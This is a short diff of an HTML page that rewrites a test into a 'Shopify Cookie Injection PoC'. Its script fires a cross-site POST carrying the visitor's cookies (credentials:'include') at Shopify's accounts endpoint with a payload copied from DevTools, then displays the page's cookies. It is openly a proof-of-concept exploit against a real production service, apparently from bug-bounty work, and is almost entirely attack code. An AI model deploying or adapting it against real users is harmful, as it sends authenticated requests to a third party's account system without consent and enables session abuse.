--- a/index.html
+++ b/index.html
@@ -1,30 +1,26 @@
 <!DOCTYPE html>
 <html>
 <body>
-<h1>Testing Shopify Cookie Injection...</h1>
-<pre id="output">Waiting...</pre>
+<h1>Shopify Cookie Injection PoC</h1>
+<pre id="output">Running exploit...</pre>
 <script>
 (async () => {
     try {
-        const response = await fetch("https://accounts.shopify.com/.well-known/dux", {
+        // Step 1 — Send the exact request body you saw in DevTools
+        const res = await fetch("https://accounts.shopify.com/.well-known/dux", {
             method: "POST",
-            credentials: "include",
-            headers: {
-                "Content-Type": "application/json"
-            },
-            body: JSON.stringify({
-                multiTrackToken: "test",
-                sessionToken: "test",
-                enableActiveConsent: false,
-                enableProtoEventForwarding: false,
-                events: []
-            })
+            credentials: "include", // send Shopify cookies
+            headers: { "Content-Type": "application/x-www-form-urlencoded" },
+            body: "RenderableItem=%2Fshow%2F3%2Ffjnfjrtyj7qztrwnm0dvsberpybnvz"
         });
 
-        document.getElementById("output").textContent =
-            "Status: " + response.status + "\n" +
-            "Headers: \n" + Array.from(response.headers.entries()).map(e => e.join(": ")).join("\n") +
-            "\n\nCookies now set for this domain:\n" + document.cookie;
+        // Step 2 — Wait for cookies to be set
+        setTimeout(() => {
+            const cookies = document.cookie;
+            document.getElementById("output").textContent =
+                "HTTP Status: " + res.status + "\n\n" +
+                "Cookies for this domain:\n" + cookies;
+        }, 500); // slight delay to ensure cookies are written
     } catch (err) {
         document.getElementById("output").textContent = "Error: " + err;
     }
